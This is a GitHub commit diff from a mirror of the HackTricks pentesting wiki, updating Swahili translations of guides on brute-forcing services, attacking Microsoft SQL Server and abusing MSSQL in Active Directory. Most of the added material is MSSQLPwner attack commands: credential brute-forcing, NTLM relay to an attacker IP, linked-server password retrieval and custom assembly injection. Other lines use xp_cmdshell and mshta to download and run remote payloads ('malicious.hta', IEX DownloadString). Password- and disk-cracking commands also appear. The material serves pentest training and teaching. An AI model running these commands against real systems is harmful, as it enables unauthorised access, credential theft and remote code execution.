2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-20 16:08:27 +00:00

Translated ['generic-methodologies-and-resources/brute-force.md', 'netwo

This commit is contained in:
Translator 2024-09-15 15:23:28 +00:00
parent c78bf9a99b
commit 7f6565c594
4 changed files with 204 additions and 63 deletions
generic-methodologies-and-resources
network-services-pentesting/pentesting-mssql-microsoft-sql-server
windows-hardening/active-directory-methodology

View file

@ -3,14 +3,14 @@
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) kujenga na **kujiendesha** kwa urahisi kazi zinazotumiwa na zana za jamii **zilizoendelea zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) kujenga na **kujiendesha** kwa urahisi kazi zinazotumiwa na zana za jamii **za kisasa zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -67,7 +67,7 @@ python3 cupp.py -h
```
### [Wister](https://github.com/cycurity/wister)
Zana la kuunda orodha ya maneno, linalokuruhusu kutoa seti ya maneno, likikupa uwezekano wa kuunda tofauti nyingi kutoka kwa maneno yaliyotolewa, kuunda orodha ya maneno ya kipekee na bora kutumia kuhusu lengo maalum.
Zana la kizazi cha orodha ya maneno, linalokuruhusu kutoa seti ya maneno, likikupa uwezekano wa kuunda tofauti nyingi kutoka kwa maneno yaliyotolewa, kuunda orodha ya maneno ya kipekee na bora kutumia kuhusu lengo maalum.
```bash
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
@ -104,14 +104,14 @@ Finished in 0.920s.
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) kujenga na **kujiendesha kiotomatiki** kazi kwa urahisi kwa kutumia zana za jamii **zilizoendelea zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) kujenga na **kujiendesha** kwa urahisi kazi zinazotumiwa na zana za jamii **zilizoendelea zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
## Huduma
Zimepangwa kwa alfabeti kulingana na jina la huduma.
Zimeagizwa kwa alfabeti kulingana na jina la huduma.
### AFP
```bash
@ -240,6 +240,25 @@ use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
```
### MSSQL
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
```shell
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
```
```bash
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
```
@ -409,7 +428,7 @@ Baadhi ya mifumo yana kasoro zinazojulikana katika mbegu za nasibu zinazotumika
### STOMP (ActiveMQ, RabbitMQ, HornetQ na OpenMQ)
Protokali ya maandiko ya STOMP ni protokali maarufu ya ujumbe ambayo **inaruhusu mawasiliano na mwingiliano bila mshono na huduma maarufu za kupanga ujumbe** kama RabbitMQ, ActiveMQ, HornetQ, na OpenMQ. Inatoa njia iliyo sanifishwa na yenye ufanisi ya kubadilishana ujumbe na kufanya operesheni mbalimbali za ujumbe.
Protokali ya maandiko ya STOMP ni protokali maarufu ya ujumbe ambayo **inaruhusu mawasiliano na mwingiliano bila mshono na huduma maarufu za kupanga ujumbe** kama RabbitMQ, ActiveMQ, HornetQ, na OpenMQ. Inatoa njia iliyoandikwa na yenye ufanisi ya kubadilishana ujumbe na kufanya operesheni mbalimbali za ujumbe.
```bash
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
```
@ -457,11 +476,11 @@ Pata Ufikiaji Leo:
## Local
### Hifadhidata za mtandaoni za kuvunja
### Maktaba za mtandaoni za kuvunja
* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1)
* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 na/au bila ESS/SSP na na thamani yoyote ya changamoto)
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, na archives MSOffice, ZIP, PDF...)
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, na maktaba za MSOffice, ZIP, PDF...)
* [https://crackstation.net/](https://crackstation.net) (Hashes)
* [https://md5decrypt.net/](https://md5decrypt.net) (MD5)
* [https://gpuhash.me/](https://gpuhash.me) (Hashes na file hashes)
@ -471,7 +490,7 @@ Pata Ufikiaji Leo:
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5)
* [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com)
Angalia hii kabla ya kujaribu kuvunja Hash kwa nguvu.
Angalia hii kabla ya kujaribu kuvunja Hash kwa nguvu.
### ZIP
```bash
@ -560,11 +579,11 @@ john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
### Lucks image
### Picha ya Luks
#### Method 1
#### Njia 1
Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
Sakinisha: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
```bash
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
@ -661,11 +680,11 @@ john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```
### Hashcat
#### Hashcat attacks
#### Hashcat mashambulizi
* **Wordlist attack** (`-a 0`) na sheria
* **Shambulio la orodha ya maneno** (`-a 0`) na sheria
**Hashcat** tayari inakuja na **folda yenye sheria** lakini unaweza kupata [**sheria nyingine za kuvutia hapa**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
**Hashcat** tayari inakuja na **kabrasha lenye sheria** lakini unaweza kupata [**sheria nyingine za kuvutia hapa**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
```
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
```
@ -758,8 +777,8 @@ Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" al
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -43,10 +43,10 @@ nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %}
Ikiwa **huna** **akikazi** unaweza kujaribu kuyakisia. Unaweza kutumia nmap au metasploit. Kuwa makini, unaweza **kufunga akaunti** ikiwa unashindwa kuingia mara kadhaa ukitumia jina la mtumiaji lililopo.
Ikiwa **huna** **vithibitisho** unaweza kujaribu kuvihisi. Unaweza kutumia nmap au metasploit. Kuwa makini, unaweza **kufunga akaunti** ikiwa unashindwa kuingia mara kadhaa ukitumia jina la mtumiaji lililopo.
{% endhint %}
#### Metasploit (inahitaji creds)
#### Metasploit (inahitaji vithibitisho)
```bash
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
@ -83,6 +83,26 @@ msf> use windows/manage/mssql_local_auth_bypass
### Uhesabu wa Mikono
#### Ingia
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
```shell
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
```
```bash
# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
@ -157,7 +177,7 @@ SELECT * FROM sysusers
2. **Permission:** Inahusishwa na SQL Server securables, ruhusa kama ALTER, CONTROL, na CREATE zinaweza kutolewa kwa principal. Usimamizi wa ruhusa unafanyika katika ngazi mbili:
* **Server Level** kwa kutumia logins
* **Database Level** kwa kutumia watumiaji
3. **Principal:** Neno hili linarejelea kitengo ambacho kinapewa ruhusa kwa securable. Principals hasa ni pamoja na logins na watumiaji wa database. Udhibiti wa ufikiaji kwa securables unatekelezwa kupitia utoaji au kukataa ruhusa au kwa kujumuisha logins na watumiaji katika roles zilizo na haki za ufikiaji.
3. **Principal:** Neno hili linarejelea chombo ambacho kinapewa ruhusa kwa securable. Principals hasa ni pamoja na logins na watumiaji wa database. Udhibiti wa ufikiaji kwa securables unatekelezwa kupitia utoaji au kukataa ruhusa au kwa kujumuisha logins na watumiaji katika roles zilizo na haki za ufikiaji.
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
@ -182,7 +202,7 @@ EXEC sp_helprotect 'xp_cmdshell'
### Execute OS Commands
{% hint style="danger" %}
Kumbuka kwamba ili uweze kutekeleza amri, si tu inahitajika kuwa na **`xp_cmdshell`** **imewezeshwa**, bali pia kuwa na **ruhusa ya EXECUTE kwenye utaratibu wa kuhifadhi `xp_cmdshell`**. Unaweza kupata nani (isipokuwa sysadmins) anaweza kutumia **`xp_cmdshell`** kwa:
Kumbuka kwamba ili uweze kutekeleza amri si tu inahitajika kuwa na **`xp_cmdshell`** **imewezeshwa**, bali pia kuwa na **ruhusa ya EXECUTE kwenye utaratibu wa kuhifadhi `xp_cmdshell`**. Unaweza kupata nani (isipokuwa sysadmins) anaweza kutumia **`xp_cmdshell`** kwa:
```sql
Use master
EXEC sp_helprotect 'xp_cmdshell'
@ -215,7 +235,21 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1
# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
```
### Kuiba NetNTLM hash / Mashambulizi ya Relay
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
```shell
# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
```
### Kununua NetNTLM hash / Shambulio la Relay
Unapaswa kuanzisha **SMB server** ili kukamata hash inayotumika katika uthibitishaji (`impacket-smbserver` au `responder` kwa mfano).
```bash
@ -229,6 +263,17 @@ sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
```
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
```shell
# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
```
{% hint style="warning" %}
Unaweza kuangalia ni nani (mbali na sysadmins) ana ruhusa ya kuendesha kazi hizo za MSSQL kwa:
```sql
@ -315,7 +360,7 @@ GO
Microsoft SQL Server inatoa **taratibu nyingi za kuhifadhi zilizopanuliwa** ambazo zinakuwezesha kuingiliana si tu na mtandao bali pia na mfumo wa faili na hata [**Usajili wa Windows**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:**
| **Kawaida** | **Inayojulikana kwa Kifaa** |
| **Kawaida** | **Inayojulikana kwa Kifaa** |
| ---------------------------- | -------------------------------------- |
| sys.xp\_regread | sys.xp\_instance\_regread |
| sys.xp\_regenumvalues | sys.xp\_instance\_regenumvalues |
@ -448,7 +493,7 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
## Kutolewa kwa nywila kutoka kwa SQL Server Linked Servers
Mshambuliaji anaweza kutoa nywila za SQL Server Linked Servers kutoka kwa SQL Instances na kuzipata kwa maandiko wazi, akimpa mshambuliaji nywila ambazo zinaweza kutumika kupata ushawishi mkubwa zaidi kwenye lengo. Skripti ya kutoa na kufichua nywila zilizohifadhiwa kwa Linked Servers inaweza kupatikana [hapa](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords)
Mshambuliaji anaweza kutoa nywila za SQL Server Linked Servers kutoka kwa SQL Instances na kuzipata kwa maandiko wazi, akimpa mshambuliaji nywila ambazo zinaweza kutumika kupata msingi mkubwa zaidi kwenye lengo. Skripti ya kutoa na kufichua nywila zilizohifadhiwa kwa Linked Servers inaweza kupatikana [hapa](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords)
Baadhi ya mahitaji, na usanidi lazima yafanyike ili exploit hii ifanye kazi. Kwanza kabisa, lazima uwe na haki za Administrator kwenye mashine, au uwezo wa kusimamia Usanidi wa SQL Server.
@ -462,12 +507,12 @@ Ili kujiandaa kwa usanidi huu, [hii hazina](https://github.com/IamLeandrooooo/SQ
Kwa maelezo zaidi, rejelea viungo vifuatavyo kuhusu shambulio hili: [Kufichua Nywila za MSSQL Database Link Server](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
[Tatizo la Muunganisho wa Usimamizi wa SQL Server](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
[Kutatua matatizo ya Muunganisho wa Msimamizi wa SQL Server](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
## Kuinua Haki za Mlokole
Mtumiaji anayekimbia MSSQL server atakuwa amewezesha token ya haki **SeImpersonatePrivilege.**\
Huenda ukawa na uwezo wa **kuinua hadi kwa Administrator** ukifuatia moja ya hizi kurasa 2:
Huenda ukawa na uwezo wa **kuinua hadi kwa Msimamizi** ukifuatia moja ya hizi kurasa 2:
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %}
[roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)

View file

@ -1,16 +1,16 @@
# MSSQL AD Abuse
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
@ -21,6 +21,72 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## **MSSQL Enumeration / Discovery**
### Python
Zana ya [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) inategemea impacket, na pia inaruhusu kuthibitisha kwa kutumia tiketi za kerberos, na kushambulia kupitia minyororo ya viungo.
<figure><img src="https://raw.githubusercontent.com/ScorpionesLabs/MSSqlPwner/main/assets/interractive.png"></figure>
```shell
# Interactive mode
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
# Interactive mode with 2 depth level of impersonations
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive
# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
# Executing direct query
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"
# Retrieving password from the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password
# Execute code using custom assembly on the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
```
### Kuorodhesha kutoka kwenye mtandao bila kikao cha kikoa
```
# Interactive mode
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
```
---
### Powershell
Moduli ya powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) ni muhimu sana katika kesi hii.
```powershell
Import-Module .\PowerupSQL.psd1
@ -58,7 +124,7 @@ Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
## MSSQL Msingi wa Kutumiwa
## MSSQL Msingi wa Kutumia
### Upatikanaji wa DB
```powershell
@ -79,21 +145,21 @@ Inaweza pia kuwa na uwezekano wa **kutekeleza amri** ndani ya mwenyeji wa MSSQL
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
Check in the page mentioned in the **sehemu ifuatayo jinsi ya kufanya hivi kwa mikono.**
Check in the page mentioned in the **following section how to do this manually.**
### MSSQL Njia za Msingi za Hacking
### MSSQL Basic Hacking Tricks
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
{% endcontent-ref %}
## MSSQL Viungo Vilivyokubaliwa
## MSSQL Trusted Links
Ikiwa mfano wa MSSQL unakubaliwa (kiungo cha database) na mfano mwingine wa MSSQL. Ikiwa mtumiaji ana mamlaka juu ya database iliyo na uaminifu, ataweza **kutumia uhusiano wa uaminifu kutekeleza maswali pia katika mfano mwingine**. Hii inaruhusiwa kuunganishwa na kwa wakati fulani mtumiaji anaweza kupata database iliyo na mipangilio isiyo sahihi ambapo anaweza kutekeleza amri.
Ikiwa mfano wa MSSQL unakubaliwa (kiungo cha database) na mfano mwingine wa MSSQL. Ikiwa mtumiaji ana mamlaka juu ya database iliyoaminika, ataweza **kutumia uhusiano wa kuaminiana kutekeleza maswali pia katika mfano mwingine**. Hizi zinazoaminika zinaweza kuunganishwa na wakati fulani mtumiaji anaweza kupata database iliyo na mipangilio isiyo sahihi ambapo anaweza kutekeleza amri.
**Viungo kati ya databases vinafanya kazi hata kupitia uaminifu wa msitu.**
**Viungo kati ya databases vinafanya kazi hata katika uaminifu wa msitu.**
### Abuse ya Powershell
### Powershell Abuse
```powershell
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
@ -133,19 +199,19 @@ Unaweza kuangalia kwa urahisi viungo vinavyotegemewa kwa kutumia metasploit.
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
Notice that metasploit will try to abuse only the `openquery()` function in MSSQL (so, if you can't execute command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.)
Kumbuka kwamba metasploit itajaribu kutumia tu kazi ya `openquery()` katika MSSQL (hivyo, ikiwa huwezi kutekeleza amri na `openquery()`, utahitaji kujaribu njia ya `EXECUTE` **kwa mikono** kutekeleza amri, angalia zaidi hapa chini.)
### Manual - Openquery()
From **Linux** you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py.**
Kutoka **Linux** unaweza kupata shell ya MSSQL console kwa kutumia **sqsh** na **mssqlclient.py.**
From **Windows** you could also find the links and execute commands manually using a **MSSQL client like** [**HeidiSQL**](https://www.heidisql.com)
Kutoka **Windows** pia unaweza kupata viungo na kutekeleza amri kwa mikono ukitumia **MSSQL client kama** [**HeidiSQL**](https://www.heidisql.com)
_Login using Windows authentication:_
_Ingia kwa kutumia uthibitisho wa Windows:_
![](<../../.gitbook/assets/image (808).png>)
#### Tafuta Viungo vya Kuaminika
#### Pata Viungo vya Kuaminika
```sql
select * from master..sysservers;
EXEC sp_linkedservers;
@ -186,7 +252,7 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
Mtumiaji wa **MSSQL wa ndani** kwa kawaida ana aina maalum ya ruhusa inayoitwa **`SeImpersonatePrivilege`**. Hii inaruhusu akaunti "kujifanya mteja baada ya uthibitisho".
Mkakati ambao waandishi wengi wamekuja nao ni kulazimisha huduma ya SYSTEM kuthibitisha kwa huduma ya uasi au mtu katikati ambayo mshambuliaji anaunda. Huduma hii ya uasi inaweza kujifanya kuwa huduma ya SYSTEM wakati inajaribu kuthibitisha.
Mkakati ambao waandishi wengi wamekuja nao ni kulazimisha huduma ya SYSTEM kuthibitisha kwa huduma ya uasi au mtu katikati ambayo mshambuliaji anaunda. Huduma hii ya uasi inaweza kujifanya kama huduma ya SYSTEM wakati inajaribu kuthibitisha.
[SweetPotato](https://github.com/CCob/SweetPotato) ina mkusanyiko wa mbinu hizi mbalimbali ambazo zinaweza kutekelezwa kupitia amri ya `execute-assembly` ya Beacon.
@ -203,7 +269,7 @@ Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -17,22 +17,22 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## SharpSystemTriggers
